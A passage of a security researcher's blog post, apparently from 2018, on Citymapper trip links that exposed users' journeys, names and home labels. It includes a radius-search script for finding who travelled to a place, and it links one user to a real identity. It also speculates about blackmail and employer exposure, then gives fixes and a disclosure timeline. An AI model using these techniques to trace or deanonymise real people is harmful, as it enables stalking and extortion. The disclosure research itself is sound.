    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 90.54054054054053%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAASABQDASIAAhEBAxEB/8QAGAABAAMBAAAAAAAAAAAAAAAAAAECBQP/xAAVAQEBAAAAAAAAAAAAAAAAAAAAAf/aAAwDAQACEAMQAAAB2aTaTm6DK1RZB//EABsQAQACAgMAAAAAAAAAAAAAAAEAAgMQESRB/9oACAEBAAEFAoilBrX2czOdrX//xAAUEQEAAAAAAAAAAAAAAAAAAAAg/9oACAEDAQE/AR//xAAWEQADAAAAAAAAAAAAAAAAAAAAEBH/2gAIAQIBAT8BI//EAB0QAAAFBQAAAAAAAAAAAAAAAAABAgMREBIgIVH/2gAIAQEABj8CGjgQpV59wbr/AP/EABwQAAICAgMAAAAAAAAAAAAAAAERACEQMUFRsf/aAAgBAQABPyGG9siimo+LsBQmge8hF4HHuBqf/9oADAMBAAIAAwAAABAv/wCC/8QAFhEAAwAAAAAAAAAAAAAAAAAAABAR/9oACAEDAQE/ECv/xAAXEQEBAQEAAAAAAAAAAAAAAAAAAREx/9oACAECAQE/EJxpEf/EABoQAQADAQEBAAAAAAAAAAAAAAEAESFBUWH/2gAIAQEAAT8QWhUqthTZABT47NkwtV15RDs0OLBYvKagOxrUmFPuAeGzAn//2Q==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Route&quot;
        title=&quot;Route&quot;
        src=&quot;/static/fc71083eff08a284bfccc60cd32be03f/1c72d/route.jpg&quot;
        srcset=&quot;/static/fc71083eff08a284bfccc60cd32be03f/a80bd/route.jpg 148w,
/static/fc71083eff08a284bfccc60cd32be03f/1c91a/route.jpg 295w,
/static/fc71083eff08a284bfccc60cd32be03f/1c72d/route.jpg 590w,
/static/fc71083eff08a284bfccc60cd32be03f/a8a14/route.jpg 885w,
/static/fc71083eff08a284bfccc60cd32be03f/10fd8/route.jpg 942w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;With a bit of help from electoral records and social media, we can attribute Chris to an actual human being… with actual friends and an actual job.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/7c11fbc01024aa0f77e7c05672b711d2/7c09c/records.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 83.78378378378379%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAARABQDASIAAhEBAxEB/8QAFwABAQEBAAAAAAAAAAAAAAAAAAMCBP/EABYBAQEBAAAAAAAAAAAAAAAAAAECAP/aAAwDAQACEAMQAAAB6625ai6o18BWxn//xAAbEAADAAIDAAAAAAAAAAAAAAABAgMAEBMUIv/aAAgBAQABBQJXQEXQZ2ExpIBP2/DPQ1//xAAWEQEBAQAAAAAAAAAAAAAAAAAiABD/2gAIAQMBAT8BUt//xAAWEQEBAQAAAAAAAAAAAAAAAAAhABD/2gAIAQIBAT8BI3//xAAeEAACAQMFAAAAAAAAAAAAAAAAARECMWEDICIyUf/aAAgBAQAGPwJvm5yWqLMlUTgirRaXsnXZ/8QAHhAAAQMEAwAAAAAAAAAAAAAAAQARcRAxQVFhkfD/2gAIAQEAAT8hL4m2shAm7CgBZa5jA3XAZDBaWXgaZzT/2gAMAwEAAgADAAAAEMjv/P/EABgRAAMBAQAAAAAAAAAAAAAAAAERUQAQ/9oACAEDAQE/EFYysd//xAAYEQACAwAAAAAAAAAAAAAAAAAAEQEQQf/aAAgBAgEBPxB5gd//xAAfEAEAAgEDBQAAAAAAAAAAAAABABEhEFGRMWGBwdH/2gAIAQEAAT8QVwrtHYXiIQot9R5WAUeQH3EcCsSK2y1ApeHBkLE7Tl91xP/Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Records&quot;
        title=&quot;Records&quot;
        src=&quot;/static/7c11fbc01024aa0f77e7c05672b711d2/1c72d/records.jpg&quot;
        srcset=&quot;/static/7c11fbc01024aa0f77e7c05672b711d2/a80bd/records.jpg 148w,
/static/7c11fbc01024aa0f77e7c05672b711d2/1c91a/records.jpg 295w,
/static/7c11fbc01024aa0f77e7c05672b711d2/1c72d/records.jpg 590w,
/static/7c11fbc01024aa0f77e7c05672b711d2/a8a14/records.jpg 885w,
/static/7c11fbc01024aa0f77e7c05672b711d2/7c09c/records.jpg 975w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Arguably, this journey in isolation isn’t very useful to anybody, malicious or otherwise. If I ran my Python script for a month, however, there would probably be enough data to start building a pattern of life for Chris (depending on how often he uses the application). This is especially pertinent as some of the journeys I harvested dated from over two years earlier. With such a small dataset, though, I couldn’t confirm whether every journey ever made on Citymapper was available.&lt;/p&gt;
&lt;p&gt;What is interesting though is that if you take an ‘end location’ and work backwards you can see which individuals have been to certain locations.&lt;/p&gt;
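&lt;p&gt;Working backwards from an end location amounts to a radius search over trip end points. Below is a minimal sketch using the haversine great-circle distance. The Eiffel Tower coordinates are approximate, the trip records are hypothetical, and the 250 m radius is an arbitrary choice.&lt;/p&gt;

```python
import math

EARTH_RADIUS_M = 6_371_000  # mean Earth radius in metres


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two lat/long points."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def trips_ending_near(trips, lat, lon, radius_m):
    """Return the trips whose end point lies within radius_m of (lat, lon)."""
    return [t for t in trips if radius_m >= haversine_m(lat, lon, *t["end"])]


EIFFEL_TOWER = (48.8584, 2.2945)  # approximate
# Hypothetical trip records for illustration.
trips = [
    {"id": "a", "end": (48.8583, 2.2944)},  # at the tower
    {"id": "b", "end": (48.8606, 2.3376)},  # near the Louvre, roughly 3 km away
]
print([t["id"] for t in trips_ending_near(trips, *EIFFEL_TOWER, radius_m=250)])
```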
&lt;p&gt;In my dataset there were 5 instances of journeys planned to visit the Eiffel Tower in Paris; the 5 people had made their way there from shopping, bars, or hotels. Not surprising.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/4f5936eafd1898d6d76f8ff073a04256/2bfdb/paris.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 71.62162162162163%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAOABQDASIAAhEBAxEB/8QAFwAAAwEAAAAAAAAAAAAAAAAAAAIDBf/EABYBAQEBAAAAAAAAAAAAAAAAAAEAAv/aAAwDAQACEAMQAAAB1aiAxIzf/8QAFhABAQEAAAAAAAAAAAAAAAAAARAg/9oACAEBAAEFAgwz/8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAwEBPwE//8QAFhEBAQEAAAAAAAAAAAAAAAAAAAES/9oACAECAQE/AbWn/8QAFhAAAwAAAAAAAAAAAAAAAAAAEBEg/9oACAEBAAY/AoQ//8QAGhAAAgIDAAAAAAAAAAAAAAAAASEAEBFBUf/aAAgBAQABPyHcYUg6HIWA1f/aAAwDAQACAAMAAAAQk9//xAAWEQEBAQAAAAAAAAAAAAAAAAABABH/2gAIAQMBAT8QDC2//8QAGBEAAgMAAAAAAAAAAAAAAAAAAAERIXH/2gAIAQIBAT8QntmD/8QAHRABAAMAAQUAAAAAAAAAAAAAAQARIUExUWFxsf/aAAgBAQABPxBF6vLfHmNRQMUHfcs2kiEoZ9iUE91iT//Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Paris&quot;
        title=&quot;Paris&quot;
        src=&quot;/static/4f5936eafd1898d6d76f8ff073a04256/1c72d/paris.jpg&quot;
        srcset=&quot;/static/4f5936eafd1898d6d76f8ff073a04256/a80bd/paris.jpg 148w,
/static/4f5936eafd1898d6d76f8ff073a04256/1c91a/paris.jpg 295w,
/static/4f5936eafd1898d6d76f8ff073a04256/1c72d/paris.jpg 590w,
/static/4f5936eafd1898d6d76f8ff073a04256/a8a14/paris.jpg 885w,
/static/4f5936eafd1898d6d76f8ff073a04256/2bfdb/paris.jpg 1147w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;But what if we look somewhere less reputable, such as Amsterdam’s red light district?&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/814be75fc38bd7677b79a98ded36a698/14cbd/amsterdam.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 91.8918918918919%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAASABQDASIAAhEBAxEB/8QAFwABAQEBAAAAAAAAAAAAAAAAAAECBf/EABYBAQEBAAAAAAAAAAAAAAAAAAIAAf/aAAwDAQACEAMQAAAB68srLZHNDuAb/8QAGBAAAgMAAAAAAAAAAAAAAAAAAAEQESD/2gAIAQEAAQUCzUIZ/8QAFBEBAAAAAAAAAAAAAAAAAAAAIP/aAAgBAwEBPwEf/8QAFREBAQAAAAAAAAAAAAAAAAAAEEH/2gAIAQIBAT8BIf/EABQQAQAAAAAAAAAAAAAAAAAAADD/2gAIAQEABj8CH//EABwQAAEEAwEAAAAAAAAAAAAAAAAQMUFhAREhgf/aAAgBAQABPyEmzk4Ry2vVuP/aAAwDAQACAAMAAAAQUxD/AP/EABkRAAIDAQAAAAAAAAAAAAAAAAABEBExQf/aAAgBAwEBPxDhTHsf/8QAFxEAAwEAAAAAAAAAAAAAAAAAAAExEf/aAAgBAgEBPxBU1CodP//EABsQAAICAwEAAAAAAAAAAAAAAAEhABExQVGB/9oACAEBAAE/EMbjsQTbmJYpm1EavIiJCzAB6ejAy+CEW4Z31P/Z&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Amsterdam&quot;
        title=&quot;Amsterdam&quot;
        src=&quot;/static/814be75fc38bd7677b79a98ded36a698/1c72d/amsterdam.jpg&quot;
        srcset=&quot;/static/814be75fc38bd7677b79a98ded36a698/a80bd/amsterdam.jpg 148w,
/static/814be75fc38bd7677b79a98ded36a698/1c91a/amsterdam.jpg 295w,
/static/814be75fc38bd7677b79a98ded36a698/1c72d/amsterdam.jpg 590w,
/static/814be75fc38bd7677b79a98ded36a698/a8a14/amsterdam.jpg 885w,
/static/814be75fc38bd7677b79a98ded36a698/14cbd/amsterdam.jpg 901w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;We can see that a handful of people may be unaware that their trips are publicly available. If we used OSINT to research these trips and people, might we find a happily married man to blackmail?&lt;/p&gt;
&lt;p&gt;Would Oscar’s employers be happy to know that he was taking a trip home at 04:03 on a Wednesday morning?&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/63be53083c7cfc0e4fd11ed67245ba55/ef245/oscar.jpg&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 66.21621621621621%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAANABQDASIAAhEBAxEB/8QAFwABAQEBAAAAAAAAAAAAAAAAAAIDBP/EABQBAQAAAAAAAAAAAAAAAAAAAAH/2gAMAwEAAhADEAAAAey9pEon/8QAFxABAAMAAAAAAAAAAAAAAAAAAQARIP/aAAgBAQABBQJIXn//xAAVEQEBAAAAAAAAAAAAAAAAAAAQEf/aAAgBAwEBPwGn/8QAFhEBAQEAAAAAAAAAAAAAAAAAAAEh/9oACAECAQE/AYx//8QAFBABAAAAAAAAAAAAAAAAAAAAIP/aAAgBAQAGPwJf/8QAGhAAAwEBAQEAAAAAAAAAAAAAAAERIWExQf/aAAgBAQABPyFtm96aYvfpSKDQlD//2gAMAwEAAgADAAAAENMv/8QAFxEAAwEAAAAAAAAAAAAAAAAAAAEhUf/aAAgBAwEBPxByXT//xAAXEQADAQAAAAAAAAAAAAAAAAAAARFx/9oACAECAQE/EErhg//EABoQAQEBAQEBAQAAAAAAAAAAAAERIQAxQVH/2gAIAQEAAT8QWUqoIZwt4FKmziQNzMeQOYN4JS6z350GL7+9/9k=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Oscar&quot;
        title=&quot;Oscar&quot;
        src=&quot;/static/63be53083c7cfc0e4fd11ed67245ba55/1c72d/oscar.jpg&quot;
        srcset=&quot;/static/63be53083c7cfc0e4fd11ed67245ba55/a80bd/oscar.jpg 148w,
/static/63be53083c7cfc0e4fd11ed67245ba55/1c91a/oscar.jpg 295w,
/static/63be53083c7cfc0e4fd11ed67245ba55/1c72d/oscar.jpg 590w,
/static/63be53083c7cfc0e4fd11ed67245ba55/a8a14/oscar.jpg 885w,
/static/63be53083c7cfc0e4fd11ed67245ba55/ef245/oscar.jpg 1112w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;The Fix&lt;/h3&gt;
&lt;p&gt;I wouldn’t classify this as a bug or a security flaw per se, but Citymapper could do more to prevent this type of attack from being used in the wild:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;To protect future URLs, increase the ID complexity, either by making IDs longer or by drawing them from a larger character set (for example, including uppercase and special characters).&lt;/li&gt;
&lt;li&gt;Audit historical trips and remove links to trips more than a few days old; there is no reason for a link to remain live once a trip is complete.&lt;/li&gt;
&lt;li&gt;Remove first names and home labels from the public-facing API.&lt;/li&gt;
&lt;/ol&gt;
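&lt;p&gt;The three fixes above can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not Citymapper’s implementation: the function names, the three-day expiry window and the &lt;code&gt;first_name&lt;/code&gt;/&lt;code&gt;home_label&lt;/code&gt; field names are all hypothetical. For the first fix, what matters is the number of possible IDs (their entropy), so new IDs are ideally drawn from a cryptographically secure random source such as Python’s &lt;code&gt;secrets&lt;/code&gt; module.&lt;/p&gt;

```python
"""Hardening ideas for shareable trip links (illustrative sketch only).

All names here (generate_trip_id, MAX_LINK_AGE, the "first_name" and
"home_label" fields) are hypothetical; they are not Citymapper's API.
"""
import math
import secrets
from datetime import datetime, timedelta, timezone

# Assumption: "a few days" is taken to mean three days after completion.
MAX_LINK_AGE = timedelta(days=3)

# Hypothetical field names for personal data that should never be public.
PRIVATE_FIELDS = {"first_name", "home_label"}


def keyspace_bits(alphabet_size: int, length: int) -> float:
    """Bits of entropy in a uniformly random ID of `length` symbols."""
    return length * math.log2(alphabet_size)


def generate_trip_id(nbytes: int = 16) -> str:
    """Unguessable, URL-safe ID from a CSPRNG (16 bytes = 128 random bits)."""
    return secrets.token_urlsafe(nbytes)


def is_link_expired(completed_at: datetime, now: datetime,
                    max_age: timedelta = MAX_LINK_AGE) -> bool:
    """True once a finished trip's share link is older than max_age."""
    return now - completed_at > max_age


def public_trip_view(trip: dict) -> dict:
    """Copy of a trip record with the personal fields stripped out."""
    return {k: v for k, v in trip.items() if k not in PRIVATE_FIELDS}


if __name__ == "__main__":
    # Compare a hypothetical 6-char lowercase+digit ID with a 128-bit token.
    print(f"6 chars of [a-z0-9]: {keyspace_bits(36, 6):.1f} bits")
    print(f"token_urlsafe(16):   {keyspace_bits(256, 16):.1f} bits")

    trip_id = generate_trip_id()
    print("example ID:", trip_id)

    done = datetime(2017, 11, 7, 4, 3, tzinfo=timezone.utc)
    print(is_link_expired(done, done + timedelta(days=4)))  # True

    # Hypothetical trip record; only non-personal fields survive.
    trip = {"id": trip_id, "first_name": "Alice", "home_label": "Home",
            "mode": "bus"}
    print(public_trip_view(trip))
```

&lt;p&gt;Here &lt;code&gt;secrets.token_urlsafe(16)&lt;/code&gt; yields a 22-character ID carrying 128 random bits, compared with roughly 31 bits for a hypothetical six-character lowercase-and-digit ID, which puts brute-force enumeration of trip URLs far out of reach.&lt;/p&gt;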
&lt;h3&gt;Disclosure&lt;/h3&gt;
&lt;p&gt;We e-mailed Citymapper’s operations team to raise the issue, and their engineering team responded promptly and fixed it within a week. Thank you, Citymapper!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;7th November ’17: Research conducted&lt;/li&gt;
&lt;li&gt;9th November ’17: Vendor notified&lt;/li&gt;
&lt;li&gt;16th November ’17: Citymapper pushes out a patch that renders this attack infeasible, and is seeking solutions for existing URLs and the related confidentiality issues.&lt;/li&gt;
&lt;li&gt;13th February ’18: Article published&lt;/li&gt;
&lt;/ul&gt;</content:encoded></item></channel></rss>